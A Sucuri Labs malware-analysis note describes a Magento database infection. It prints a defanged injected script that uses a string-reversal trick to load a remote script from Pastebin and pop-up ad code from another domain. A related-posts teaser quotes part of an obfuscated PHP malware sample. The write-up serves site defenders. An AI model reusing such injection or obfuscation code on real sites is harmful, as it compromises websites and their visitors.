Sucuri Labs

Reversed Pastebin Injection in Magento DB

We worked on an infected Magento site that had unwanted pop-up ads when you visited it. The culprit was this injected script (spaces added intentionally)

<s c r i p t>document .write('>tpircs/<>"YzSBPWt9=i?php .war/moc . nibetsap / / :sptth"=crs tpircs<'.split("").reverse().join(""))</s c r i p t>

This code uses the reverse() JavaScript function to dynamically inject a remote script directly from Pastebin.com – https: / / pastebin . com/raw .php?i = 9tWPBSzY. That’s not the first time we see hackers leveraging the Pastebin service

This time the raw pastebin code uses the same reverse() trick to inject the final remote script from hxxp: / / lachinampa . com . mx/stat/. That script has the actual pop-up code that uses the blablatrafic .com as the intermediary between other ad providers.

In some cases, the same pop-up code injection was noticed on WordPress sites. So this isn’t limited to Magento and you should check your files and database even if you are using a different CMS. Or have us scan your site for you.

Cesar Anjos

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Related Tags

Labs Note

PHP str_replace to hide malware

Ante Kresic
January 3, 2014

We found another interesting piece of PHP-based malware on a client site a few days ago: $exg=”JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgkndYSk9PSdtandCcgJndiYgJGMondJGEpPjM”; $iyo=”GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCcvXHMvndJyksIGFyndcmF5KCcnLCcrJyk”; $ts = str_replace(“b”,””,”bsbtr_brbepblabcbe”); $fy=”sIGpndvaW4oYXJyYXlfc2xpY2UoJndGEndsJGMoJGEpLTndMpKndSkpKTtlYnd2hvICc8LycuJGsnduJz4nO30=”; $sjb=”peyRrPSndd1nddGU0bndSc7ZWNobyAnPCcnduJGsundJz4nO2ndV2YWwoYmFzZndTY0X2RlY29kZShwcmVnX3Jlc”; $dzy =…

Multi-Vector WordPress Infection from Examhome

Denis Sinegubko
September 18, 2018

This September, we’ve been seeing a massive infection wave that injects malicious JavaScript code into .js, .php files and the WordPress database.> The script looks…

Real-Time Phishing Kit Targets Brazilian Central Bank

Luke Leal
January 14, 2021

We recently found an interesting phishing kit on a compromised website that has QR code capabilities, along with the ability to control the phishing page…

Conditional redirection to an online pharmacy store

Moe O
March 28, 2019

During an investigation, a client reported some weird behavior from all incoming visits during their Google search engine result clicks are instantly redirected to an…

Soccer spam. Really?

Fernando Barbosa
September 21, 2017

In the last few months, we’ve covered several cases of SEO Spam in our labs and blog that were promoting products and services ranging from…

Hooking WordPress Class to Hide Malicious Users

John Castro
January 20, 2017

When a website is compromised, attackers perform post-exploitation tasks to maintain access to the site for as long as possible. One of these actions is…

Cesar Anjos

Related Tags

Related Categories

You May Also Like